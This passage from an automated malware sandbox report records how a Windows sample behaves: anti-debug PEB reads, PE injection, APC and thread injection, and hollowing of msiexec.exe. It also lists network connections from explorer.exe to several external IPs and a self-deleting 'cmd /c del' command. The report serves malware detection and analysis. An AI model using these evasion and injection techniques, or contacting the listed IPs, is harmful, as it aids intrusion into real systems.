              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C220A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C220A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C220A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C220A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C220A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C220A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C390AF mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C2F0BF mov ecx, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C2F0BF mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C2F0BF mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C10050 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C10050 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CB2073 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CC1074 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C77016 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C77016 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C77016 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CC4015 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CC4015 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C0B02A mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C0B02A mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C0B02A mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C0B02A mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C2002D mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C2002D mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C2002D mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C2002D mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C2002D mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C841E8 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C1C182 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C2A185 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C22990 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BFB1E1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BFB1E1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BFB1E1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C769A6 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C261A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C261A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CB49A4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CB49A4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CB49A4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CB49A4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C751BE mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C751BE mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C751BE mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C751BE mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C1B944 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C1B944 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BF9100 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BF9100 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BF9100 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BFB171 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BFB171 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BFC962 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C14120 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C14120 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C14120 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C14120 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C14120 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C2513A mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C2513A mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C22ACB mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BF52A5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BF52A5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BF52A5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BF52A5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BF52A5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C22AE4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C2D294 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C2D294 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C0AAB0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C0AAB0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C2FAB0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CBEA55 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C84257 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BFAA16 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BFAA16 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CAB260 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CAB260 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CC8A62 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BF5210 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BF5210 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BF5210 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BF5210 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C3927A mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C08A0A mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C13A1C mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
              Source: C:\Windows\explorer.exeNetwork Connect: 106.13.210.52 80
              Source: C:\Windows\explorer.exeNetwork Connect: 154.201.205.155 80
              Source: C:\Windows\explorer.exeNetwork Connect: 160.153.128.38 80
              Source: C:\Windows\explorer.exeNetwork Connect: 95.130.17.35 80
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeMemory written: C:\Users\user\Desktop\4pFzkB6ePK.exe base: 400000 value starts with: 4D5A
              Maps a DLL or memory area into another processShow sources
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
              Modifies the context of a thread in another process (thread injection)Show sources
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeThread register set: target process: 3388
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeThread register set: target process: 3388
              Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3388
              Queues an APC in another process (thread injection)Show sources
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeThread APC queued: target process: C:\Windows\explorer.exe
              Sample uses process hollowing techniqueShow sources
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: FB0000
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess created: C:\Users\user\Desktop\4pFzkB6ePK.exe C:\Users\user\Desktop\4pFzkB6ePK.exe
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\4pFzkB6ePK.exe'
              Source: explorer.exe, 00000006.00000002.471816692.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
              Source: explorer.exe, 00000006.00000000.231260706.0000000001980000.00000002.00000001.sdmp, msiexec.exe, 0000000B.00000002.475075751.0000000003480000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: explorer.exe, 00000006.00000002.489439123.0000000006860000.00000004.00000001.sdmp, msiexec.exe, 0000000B.00000002.475075751.0000000003480000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000006.00000000.231260706.0000000001980000.00000002.00000001.sdmp, msiexec.exe, 0000000B.00000002.475075751.0000000003480000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: explorer.exe, 00000006.00000000.231260706.0000000001980000.00000002.00000001.sdmp, msiexec.exe, 0000000B.00000002.475075751.0000000003480000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Users\user\Desktop\4pFzkB6ePK.exe VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
